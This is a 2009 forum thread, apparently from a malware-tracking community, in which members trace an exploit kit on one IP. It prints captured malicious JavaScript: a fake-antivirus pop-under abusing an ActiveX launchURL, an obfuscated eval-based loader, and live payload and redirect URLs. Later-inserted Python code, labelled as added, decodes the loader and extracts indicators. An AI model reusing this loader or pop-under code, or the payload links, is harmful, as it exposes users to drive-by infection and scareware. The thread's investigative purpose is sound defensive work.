Author Topic: Domains on 78.47.186.165  (Read 6455 times)


September 10, 2009, 03:34:01 pm

jrmurray
Seeing DNS queries to these domains (and then some) which all resolve to 78.47.186.165 - Any idea what's on the server?  Looks suspicious to me...

http://www.bfk.de/bfk_dnslogger_en.html?query=78.47.186.165#result


September 16, 2009, 06:49:32 pm
Reply #1

jrmurray
If anyone can provide the slightest idea here, it would be appreciated.  Thanks.

September 17, 2009, 04:06:36 pm
Reply #2

MysteryFCM
Can't find anything on them at present, but there were apparently exploits there up to September 8th.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

September 17, 2009, 04:10:45 pm
Reply #3

MysteryFCM
The IP also apparently houses:

Code:
etyjyt.info
kb923561.in
kb929399.in
kb936782.in
kb952004.in
kb959426.in
kb960225.in
kb960715.in
kb960803.in
kb960859.info
kb968389.info
ntwin.in

September 18, 2009, 05:06:57 pm
Reply #4

MysteryFCM
An active one from egtrhn.info:

Code:
http://egtrhn.info//index.php?src=583&surl=www.springerrescue.org&sport=80&suri=%2Findex%2Ehtml
Contains:

Code:
<HTML><HEAD><TITLE> </TITLE><META HTTP-EQUIV="Content-Type" CONTENT="text/html"><META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"></HEAD><frameset framespacing="0" border="0" rows="1,*" frameborder="0"><frame src="en_pic.php?grp=13&trk=0918170022175763" scrolling="no" noresize marginwidth="0" marginheight="0"><frame src="content.php" scrolling="auto" marginwidth="0" marginheight="0"></frameset></HTML>
Contains some lovely exploits.

http://wepawet.cs.ucsb.edu/view.php?hash=7fe09d99638a268fd5c5ad8e53404af2&t=1253293660&type=js

September 21, 2009, 06:45:32 pm
Reply #5

jrmurray
Great info - Thanks MysteryFCM - so that domain (and this IP) should be added to the MDL, correct?

Any evidence of malware phone-home?  My guess is no, at least not on port 80.


September 21, 2009, 07:18:19 pm
Reply #6

SysAdMini
Haven't listed it yet, because I don't find those exploits.
In my tests a redirection to a rotator

Code:
traff2go.com/?accs=812&tid=ffie8
occurred which redirected me to a fake av site.
Code:
virusprotectiontool.com/adv/2/?a=csphbis&l=394&f=cs_123963263&ex=&ed=&sub=csp&prodabbr=3P_UAVC&al=
But it works only once.
A second attempt redirects to www.springerrescue.org as given in the URL's parameter.

Ruining the bad guy's day

September 24, 2009, 02:36:41 pm
Reply #7

jrmurray
Today I picked up this domain for the same IP address (it's live):

csbjndez.info

September 24, 2009, 02:55:54 pm
Reply #9

jrmurray
MysteryFCM - I'm curious.  How were you able to grab the URL (index.php ... ) from the domain name you found?

September 24, 2009, 03:01:27 pm
Reply #10

MysteryFCM
I found it on a compromised site. The same URL also works with the one you posted ;)

Code:
csbjndez.info/index.php?src=583&surl=www.springerrescue.org&sport=80&suri=%2Findex%2Ehtml
Redirects to:

Code:
csbjndez.info/index2.php?src=583&trk=0924150025488126
Which contains:

Code:
<HTML><HEAD><TITLE> </TITLE><META HTTP-EQUIV="Content-Type" CONTENT="text/html"><META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"></HEAD><frameset framespacing="0" border="0" rows="1,*" frameborder="0"><frame src="en_pic.php?grp=14&trk=0924150025488126" scrolling="no" noresize marginwidth="0" marginheight="0"><frame src="content.php" scrolling="auto" marginwidth="0" marginheight="0"></frameset></HTML>

September 24, 2009, 03:03:02 pm
Reply #11

MysteryFCM
content.php:

Code:
<html><head>
<STYLE type="text/css"> body {font-family: Verdana; font-size: 9pt; color: black; background-color: #ffffff;} td {font-family: Verdana; font-size: 9pt; color: black; background-color: #ffffff;} tr {background-color: #ffffff;} table {color: #ffffff; background-color: #999999;} </STYLE>
<title>Loading...</title></head><body>
<table CELLPADDING=0 CELLSPACING=0 width=100% height=100% align=center valign=center border=0><tr><td align=center>
<table CELLPADDING=0 CELLSPACING=0 align=center valign=center border=0><tr><td align=center>

<span id="load"><b>Loading Page, please wait...</b> <img src="loading.gif" width=16 height=16></span>

<script language="JavaScript">

function BDrag(width_div, height_div){
 var tpos="fixed"; if (navigator.appName=="Microsoft Internet Explorer") { var tpos="absolute"; };
 var dnd = document.getElementById("drag_n"); dnd.style.position = tpos; dnd.style.top = "50%"; dnd.style.left = "50%"; dnd.style.marginTop = "-" + height_div / 2 + "px"; dnd.style.marginLeft = "-" + width_div / 2 + "px"; dnd.style.zIndex = "5";
 var dd = document.getElementById("drag"); dd.style.position = tpos; dd.style.width = width_div + "px"; dd.style.height = height_div + "px"; dd.style.zIndex="5";
}


var cflag = true;
var adurl = "http://alsoft.in/hitin.php?affid=02913";
//var adurl = "http://go-traff.com/?accs=812&tid=clkcns";
var adurl2 = "http://dating-portal.net/aff/312/";


function BClick() {
 cflag = false;
 window.open(adurl,"_blank");
 var container=document.getElementById('drag'); if(container) { container.style.visibility='hidden'; }
 clearTimeout(timer); timer=setTimeout('BTime()',5000);
}

var is_XP_SP2 = (navigator.userAgent.indexOf("SV1") != -1) || (navigator.appMinorVersion && (navigator.appMinorVersion.indexOf('SP2') != -1));
var is_IE=false;
if (navigator.appName.toLowerCase()=='microsoft internet explorer') { if (navigator.userAgent.toLowerCase().indexOf('opera')<=0) { is_IE=true; } }
if (is_XP_SP2) { document.write("<object id=iie width=0 height=0 classid='CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'></object>"); }
function OnUnloadHandler() { if (cflag) { if (is_XP_SP2) { iie.launchURL(adurl); } else { window.open(adurl,"_blank"); } } }
window.onunload = OnUnloadHandler;

function BTime() {
 if (cflag) { cflag = false; top.location=adurl; } else { top.location=adurl2; };
}
var timer=setTimeout('BTime()',10000);

</script>

<span id="drag_n">
<span id="drag" style="display:none;text-align:left;z-index:1;">
<img src="alert_01.gif" width="456" height="164" border="0" onload="document.getElementById('drag').style.display='block'; BDrag(456,164);" onClick="BClick()" />
</span>
</span>

</td></tr></table>
</td></tr></table>
</body></html>


index2.php:

Code:
<html><head><title>Microsoft</title></head><body>
<script language=JavaScript>function get_pic(z0){var zr0=0,i,j,zr1="1",ff=0xff,zr2="2",z9=0xc,zr3=3,b=0x400,r,z7=3,s=0,z8="ss",w=0,p=0,t=Array(63,52,39,15,46,45,42,43,44,20,0,0,0,0,0,0,1,33,6,21,14,32,55,56,26,28,27,24,57,35,41,17,36,19,22,60,29,30,54,34,53,9,8,0,0,0,0,7,0,37,3,61,49,48,47,5,11,10,23,12,50,18,38,62,40,13,0,51,4,59,58,16,31,25,2);z2=z0;l=z2.length;for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;l--,i--){z1=t[z2.charCodeAt(p++)-48];z3=z1<<s;w|=z3;if(s){z4=0xc5^w;z5=z4&ff;z6=z5;w=w>>8;s-=2;r=r+String.fromCharCode(z6)}else{z7=8;s=6;z8="7";z9=w}}y1="document";y2="write";eval(y1+"."+y2+"(r)")}}y5="f2";y4="get_pic";y3=y4+'("Z0IoAlv8asHpGxUpEW666Uv72fxo6_i7s43l32f5nUh7XBJLNmv6WzhNWzio20iNsm65nUh7XBuLuMSssmv5aJJ5PHipGxoLoMSsMzu6nBh764HLNHu57VU5dH3c8j4fZ0ILsmv5a2Hp6Uio7zJ6NvxLsmv5a_JpVm3o1hf0a3hNFR45dU3o2x0Lojo8PUJLVBh6VW0LZl6NF6656DH82uxLsmv5aJJ8pH75GxDWRU40a3hNFR45dVh6NW0LTWKW2uxLsmv5aJJ8ABho2foLojo8PUJLVBJ7dW0LqByPCU40a3hNFR45dHu5sW0LRzv5szv52uxLsmv5abu5NW0L5BJ8Xofv6J652ov6Azvf7sv6M66vWDH67jJ7X6xpGQxSM_u54WxcSxxS1bxcXx3SdFx01x0SMJhopR0S2uxLsmv5a_JpVU3o1hf0a3hNFR45diH8Gx4ErBLLojo8PUJLVBJpGxUE2uxLsmv5aJJ82Bio2xp6AluLojo8PUJLVBu5VRho2xhpVR767Hhp2uxLsmv5abv81M0LNB662U4uVBJpdvoL6Rhp7V45diH8Nbu5NnopPn65El402uxLsmv5aJJ8VDho2JYNszvLoMSsa_u5SR4fa2Hp6Uio6Uv7pvipFVU5dH3cNj45dW654JJ8AB7uVBJfpn6uVBJ7dl40abv8PnHuEDhc8uxLGR4NPB7N5VDp8j4fa_u5SR4fa2Hp6Uio6Uv7pvipFVU5dH3cNj45dW65Vv45dVh6Nv45dUfuVBJpdv45dVh6Nv45dVH88uxLEDhNNVDpsm3uojD4aJiNdHH75biuauJLdUhfauJLNB662Wf62oi64zv55jJ8VQxvaJJ8pH754JJ8cWH64JJ8Fu45dBH84JJ8VUu84JJ8cWH64JJ85BhuojDpsmH65bv81s40aMJLnmH8nVHuElULoRU8FlJLoRU6A6vNGfiplRU2ZnKMdBJ5jzi5ez65dVDuojDpsmH65bv81s40aMJLnmH8nVHuEl4faxhpdzu57RUcojD4oM70Gv34oMSsa_u5SR4fa2Hp6UvvVzv6AVo6enH68uxLGR4NPB7N5VDp8j4fa_u5SR4fa2Hp6UvvVzv6AVo6enH68uxLGR4NPB7N5VDp8j4faxhpdzu57RUcojD4oM70Z0ILEDhNNVoLNBvL4JJ82B6u2Mx6A6vN7x4uVBu5VR7uVBuNAl40Z0ILsmv5a7vNf6N5dUh6G7vNfW67EUJuXB7c12UL2QGL4JJ8AvoLiU4uVBJp4xoA7Jy8FziNpUDuoMSsasvpaF462o6nVBu5plULoWSsaj462o6nVBu5p4UPSRhpGQf0a7vNf6N
5dUh67Mp6AzioVuxL6Uv7HHJ8FWvviRhp7VDuoj462o6nVBu5p44PFlH8EVU6AUp6AlhuoMSsajo8PUJL5Bv5sW0L2uxLsmv5a_H8EWH5GxoLojo8PUJLAHJ8PUJ8GxoLojo8PUJLAmi8VBhNFBho2x40Z0ILa_u5SR4fsmv5a7vNf6NPRHv58RJ8G7vNfW67EUJuXB7c12UL2hNanUh7XBuvRVipNnvL8u3l3jULa_u5Svu8PUJLlHJ7CU76nzG6sWf62o6nmHNNFlH5d4DE7Dh7F6v6pzv6dVoLCUNWBzpaRUDuojU7AUu8Gh755RL56HiE7DJu2FpWZzKEjlGPrUDuojUpdzi6XWf8VVHaF66Nr4v85xUPrWKa2s40GHiNdHH75biuoW70Z0ILaM7NPB7N5VDp8uh4oMSsajD7MRUu5Bv5sW3o2xDuauJL5Bv5sW0LBo0LojD4oMSsajD7MRUuABhppRhoGxoL8j4fa_u5SR4fa3hNFR462o6nMH76G7vNfW67EUJuXB7c12UL2JNNFlH5dlv6W4oE8nipRl75dzi6iUv7EHH82s40a_H8EWH5G7vNf6LpV6vvzzH8RRhpnliNNDp6NBipFVoc8u34nmH8nVHuEl4fGv34oMSsajo8PUJLM4vcGxoLojo8PUJLM4io2x40Z0ILa3hNFR45dUu6AW3WPBJ77x76e4Hp5MZNdVvvFmv6A6i65sou5QxcXjxcXMDc8uDcXjxcXs40Z0ILa3hNFRDpsU3o27vNf6N5dUh67x4uVB75svoLO6vE8nip53v6Nx4uVBuc4xDuo3v6FM0p7v0LoMSsajD7MVop7U3oGxoL8uJ8Fl7fODhoABhppR70M4ioOD7u22yndWH52u45dUu6AvoL7bHfEU40EDhNNVDpsU3uoM7NPB7N5VDp8uh4oM70Z0ILasvp53v6FM3o2xDuoBu5SvJPsWx7AUu8o3v6G_L84xUnyUYEBlNAYzGaynLL4JJ8F4Hp4xovEVhp2u3psmH65bv8Fs40GHiNdHH75biuoW70Gv3l3jUL8DHuM4vcGM0L2s4fdUhfoBL8GFHpFD70M4ioOD7u22ynVl752u45dUu6AvoL7bHfEU40EDhNNVDpsU3uoM7NPB7N5VDp8uh4oM70Z0ILasvpaFop7U3LGxoL8uhl3jULa3hNFRU8VBucGJJ5PHipoMSsajULsmv5a_762o65dWx8VBucoMSsajULsmv5a3iNNUhpdWxcoMSsajULdUhfoWSsajULa3hNFRofXmicGxo8PUJL6Uv7HHJ7NWf62ovL4_75dUfu2M67EUJuXB7c12Un2Jy72uU8VBuc4xDpNnvv2uU8VBuc4xDAXRJ68HiNdl667nLL8u0LojDpsmH650J5Pm3uoMSsajULa3hNFRofXmvcGx462o6nVVH62uU8VBuc4xovRVvL4_75dUfu2bH6NzKf2uU8VBuc4xDpnzJ8EVop7U3uox40EDhNNVofXmvc8u3l3jULaM7NPB7N5VDp8uhl3jULajU8Fl7fZ0ILajULa0J5PH3o27vNf6NP2uU8VBuc4x4anUh7XBuv2uU8VBuc4xDEcz6N53v6Fs402u3psmH650J5PH3uoMSsajULaM7NPB7N5VDp8uhl3jULajULdUhfoWSsajULajUL0RhNdM0Lsmv5a_ipp6662ovcG_66nzh6E4H87x4udHJ8FuoLWzH8rnippU4udHJ8FuoLE4H82uU8VBuc4xoASlKp52LLAzi666vNfnLL8u0Lobv8PnHu0RhNds40Z0ILajULajo8PUJL0RhNeM0LAzi666vNfU0L4_762o65dvoL7sv67zv52uU8VBuc4xUMOWKW2uU86Uv7VB7u2MxpEW666Uv7Fx4ud6vNfHJ84xov84v6EUuL4_75dUfu2FKPZnGL4_762o65dvoL42LLL7vNfU4udHJ8FuoLEHH82uU86Uv7VB7u2j4NNm652uU8VBuc4x4
58BvL4_762o65dvoLGh4NNHuL4_75dUfu2sHp0x4ud6vNfHJ84xDSFh3c2uU8VBuc4xD0sQHSpxicPH3vd3xSlMD0VQxppJfS2miS2uU8VBuc4xDNMUfcXJfS2uU86Uv7VB7u2hULn6HpEU4udHJ8FuoL2m65EW0L4_762o65dvoLW2LL43v6FuUn2hooL7oL4_762o65dvoL6Uv7EHH82uU8VBuc4xooyU402u3l3jULajULabv8PnHu0RhNes40Z0ILajULaM7NPB7N5VDp8uhl3jULajULaxhpdzu57RopPnv5EB70Z0ILajULaM70Z0ILajULGv3l3jULaM70Z0ILajo5EBh8F4HL1u3l3jULGzH6Vz6fZ0ILajo5EBh8F4HLXu3l3jULGv3l3jD4En65Evu5EBh8F4HLXu34oMSsGv3l33i87HH886v6a7vNfW67EUJuXBuc12U5dU0c8j4fZ0ILsmv5a_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@l0SBz3SsMoSeQpc2u45dWic4xDc@R3vSFfctWUcXJKcd3pAFs3EV30LNxDA_l0ABzKE@WDEBi3Ep_fSrU4uVBhcpvoLSJ0cFMUEdQGc1j0S1h3c130LNxUcXj0SbRfcVx4uVB7N2mxv2jxcX30EXJ3A2u45dHvN12oLsbpcFjfSXQZvl30S@WUSrzGSpFfSSJZv@HZcbmZ01_GcbHpc22oLs_3cdb3cFxZv_lfScMUSeQxEpQKc@V3vbHGE@DpcVbK0VJfA22oLl3ZS_i0EsJ3vbR0SbWUSVJ0L4JJ81M6u2F3AF33vVJ30rRfcBR3ArHxE22oLX3fSFJ3EXs3vbBfAFMUSVJH0pFfceF3vXs0EBBZc@UKcl30S22oLsJ30bi0ce3GL4JJ8pmfu2xGc@WUScJ0L4JJ81M6u2QZ0bBZvchxSc_fSsF0cXQxc22oL_mKc1F3SSs0L4JJ8pmfu2_GAVMUSd3i0pFfc_B3vd33cdbxSBVxS_DK022oL@RfAXhxEe33vlJGSSMUSV3GL4JJ81M6u2xKStR3vFb0EeQZc13ZA_m3022oLrVfABHKE@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")';y6="()";eval(y3);</script>
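The index2.php sample above hides its real content in the string passed to get_pic(): a custom 64-character alphabet (0-9, @, A-Z, _, a-z), six bits per character packed least-significant-bit first, and every output byte XORed with 0xc5 before being written back with document.write. The following is an added example, not code from the thread: a static Python re-implementation of that decoder so the string can be recovered without running the script in a browser. The table, the XOR constant and the loop structure are taken from the sample; the encoder is my own inverse of the loop and exists only to build round-trip test input. SAMPLE_PREFIX is the first 36 characters of the encoded string as posted above; the rest of that string is truncated on this page, so only the prefix is decoded here.

```python
"""Static decoder for the get_pic() obfuscation in the index2.php sample.

Added example, not part of the original thread. TABLE, XOR_KEY and the
decoding loop mirror the captured JavaScript; encode_get_pic() is my
inverse, used only to generate test input.
"""

# Substitution table copied verbatim from the sample. It is indexed by
# charCode - 48, so it covers '0' (48) .. 'z' (122). Every value 0..63 occurs
# exactly once among the alphanumerics plus '@' and '_'; the remaining slots
# (':'..'?', '['..'`') are filler that the encoder never emits.
TABLE = [63, 52, 39, 15, 46, 45, 42, 43, 44, 20, 0, 0, 0, 0, 0, 0, 1, 33, 6, 21,
         14, 32, 55, 56, 26, 28, 27, 24, 57, 35, 41, 17, 36, 19, 22, 60, 29, 30,
         54, 34, 53, 9, 8, 0, 0, 0, 0, 7, 0, 37, 3, 61, 49, 48, 47, 5, 11, 10, 23,
         12, 50, 18, 38, 62, 40, 13, 0, 51, 4, 59, 58, 16, 31, 25, 2]
XOR_KEY = 0xC5  # the 0xc5 in "z4=0xc5^w"

# First 36 characters of the get_pic("...") argument as posted in the thread.
SAMPLE_PREFIX = "Z0IoAlv8asHpGxUpEW666Uv72fxo6_i7s43l"


def decode_get_pic(encoded: str) -> bytes:
    """Mirror of the sample's loop.

    Each character contributes 6 bits at shift position s (0, 6, 4, 2, 0, ...).
    Whenever s is non-zero the low byte of the accumulator is XORed with 0xc5
    and emitted, then the accumulator is shifted down by 8. Four characters
    therefore yield three bytes, like base64 with a scrambled alphabet.
    """
    w = 0   # bit accumulator, the sample's w
    s = 0   # shift counter, the sample's s
    out = bytearray()
    for ch in encoded:
        idx = ord(ch) - 48
        if not 0 <= idx < len(TABLE):
            raise ValueError(f"character {ch!r} is outside the decoder alphabet")
        w |= TABLE[idx] << s
        if s:
            out.append((w ^ XOR_KEY) & 0xFF)
            w >>= 8
            s -= 2
        else:
            s = 6
    return bytes(out)


# Inverse alphabet (my construction): value -> the alphanumeric/'@'/'_'
# character the table maps to it. 'r' is the only such character with value 0.
ALPHABET = {v: chr(i + 48) for i, v in enumerate(TABLE)
            if chr(i + 48).isalnum() or chr(i + 48) in "@_"}


def encode_get_pic(plain: bytes) -> str:
    """Inverse of decode_get_pic (not in the sample): XOR each byte with 0xc5,
    pack up to 3 bytes into a little-endian 24-bit word, emit 6 bits per char.
    A trailing 1 or 2 bytes become 2 or 3 characters, which the decoder above
    handles because it only emits a byte when s is non-zero."""
    chars = []
    for i in range(0, len(plain), 3):
        chunk = plain[i:i + 3]
        word = 0
        for j, b in enumerate(chunk):
            word |= (b ^ XOR_KEY) << (8 * j)
        for k in range(len(chunk) + 1):
            chars.append(ALPHABET[(word >> (6 * k)) & 0x3F])
    return "".join(chars)


if __name__ == "__main__":
    print(decode_get_pic(SAMPLE_PREFIX))
    roundtrip = b'<object id="x" classid="clsid:00000000-0000-0000-0000-000000000000">'
    assert decode_get_pic(encode_get_pic(roundtrip)) == roundtrip
```

Decoding the posted prefix gives `\r\n<div id="demoobj"></div>\r`, the kind of placeholder element exploit pages use as an injection target for the frames and objects that follow. Because the full string is not on this page the rest cannot be recovered here; with a complete capture the same function returns the whole generated markup, and the `y1+"."+y2` / `eval` dance at the end of the sample is just `document.write(r)` and can be ignored.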

September 24, 2009, 03:13:36 pm
Reply #12

MysteryFCM
Forgot to mention, the payload is here btw:

Code:
csbjndez.info/gfl.php?d=11&trk=09241506645213975&s=002
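The thread now has the whole chain: the index.php landing URL carrying the referring site in surl/sport/suri, the index2.php frameset with its trk tracking id, content.php with the fake-AV bait and the onunload pop-under (on XP SP2 it instantiates the Windows Media Player control by CLSID and calls launchURL, on anything else it falls back to window.open), and finally the gfl.php payload URL. As an added example that is not code from the thread, here is a small Python script that pulls the listable indicators out of those captures statically, without executing any of the script. The excerpts in FRAMESET_HTML, CONTENT_PHP_JS and KIT_URLS are copied from the posts above; the function names and the indicator labels are my own.

```python
"""Static IOC extraction over the captures posted in this thread.

Added example, not part of the original thread. The inputs below are
excerpts of the frameset, the content.php script and the URLs posted above.
"""
import re
from urllib.parse import urlsplit, parse_qs

FRAMESET_HTML = ('<frameset framespacing="0" border="0" rows="1,*" frameborder="0">'
                 '<frame src="en_pic.php?grp=14&trk=0924150025488126" scrolling="no">'
                 '<frame src="content.php" scrolling="auto"></frameset>')

CONTENT_PHP_JS = '''
var adurl = "http://alsoft.in/hitin.php?affid=02913";
//var adurl = "http://go-traff.com/?accs=812&tid=clkcns";
var adurl2 = "http://dating-portal.net/aff/312/";
var is_XP_SP2 = (navigator.userAgent.indexOf("SV1") != -1) || (navigator.appMinorVersion && (navigator.appMinorVersion.indexOf('SP2') != -1));
if (is_XP_SP2) { document.write("<object id=iie width=0 height=0 classid='CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'></object>"); }
function OnUnloadHandler() { if (cflag) { if (is_XP_SP2) { iie.launchURL(adurl); } else { window.open(adurl,"_blank"); } } }
window.onunload = OnUnloadHandler;
'''

KIT_URLS = [
    "http://egtrhn.info//index.php?src=583&surl=www.springerrescue.org&sport=80&suri=%2Findex%2Ehtml",
    "http://csbjndez.info/index2.php?src=583&trk=0924150025488126",
    "http://csbjndez.info/gfl.php?d=11&trk=09241506645213975&s=002",
]

# A JS variable assigned an http(s) URL; the optional leading // catches the
# commented-out fallback, which still names infrastructure worth listing.
JS_URL_VAR = re.compile(
    r'^(?P<dead>\s*//\s*)?var\s+(?P<name>\w+)\s*=\s*"(?P<url>https?://[^"]+)"', re.M)
FRAME_SRC = re.compile(r'<frame[^>]*\ssrc="([^"]+)"', re.I)
CLSID = re.compile(r"classid=['\"]?CLSID:([0-9A-Fa-f-]{36})", re.I)


def js_url_vars(js: str):
    """(name, url, is_commented_out) for every URL-valued var in the script."""
    return [(m["name"], m["url"], bool(m["dead"])) for m in JS_URL_VAR.finditer(js)]


def frame_sources(html: str):
    """src attributes of <frame> tags, in document order."""
    return FRAME_SRC.findall(html)


def kit_url_fields(url: str) -> dict:
    """Host, script name and decoded query parameters of one kit URL.
    suri arrives percent-encoded (%2Findex%2Ehtml) and is decoded here."""
    parts = urlsplit(url)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return {"host": parts.hostname, "script": parts.path.rsplit("/", 1)[-1], **params}


def popunder_indicators(js: str) -> set:
    """Labels for the pop-under technique used by content.php."""
    found = set()
    m = CLSID.search(js)
    if m:
        found.add("activex_object:" + m.group(1).upper())
    if "launchURL(" in js:
        found.add("launchURL_popunder")
    if re.search(r"window\.onunload\s*=", js):
        found.add("onunload_handler")
    if re.search(r'indexOf\("SV1"\)', js):
        found.add("xp_sp2_ua_check")
    if re.search(r'window\.open\([^)]*"_blank"\)', js):
        found.add("window_open_blank")
    return found


def collect_hosts(urls, js: str) -> set:
    """Every host seen in the kit URLs and in the script's URL variables."""
    hosts = {urlsplit(u).hostname for u in urls}
    hosts |= {urlsplit(u).hostname for _, u, _ in js_url_vars(js)}
    return hosts


if __name__ == "__main__":
    for u in KIT_URLS:
        print(kit_url_fields(u))
    print(frame_sources(FRAMESET_HTML))
    print(js_url_vars(CONTENT_PHP_JS))
    print(sorted(popunder_indicators(CONTENT_PHP_JS)))
    print(sorted(collect_hosts(KIT_URLS, CONTENT_PHP_JS)))
```

Two things the output makes visible that the raw captures do not: the trk value differs between the frameset (0924150025488126) and the payload URL (09241506645213975), so the kit issues a fresh tracking id per stage rather than reusing one, which matters when reproducing the "works only once" behaviour SysAdMini saw; and the commented-out go-traff.com line uses the same accs=812 affiliate id as the traff2go.com rotator URL from Reply #6, tying the fake-AV redirect and the exploit pages to one operator.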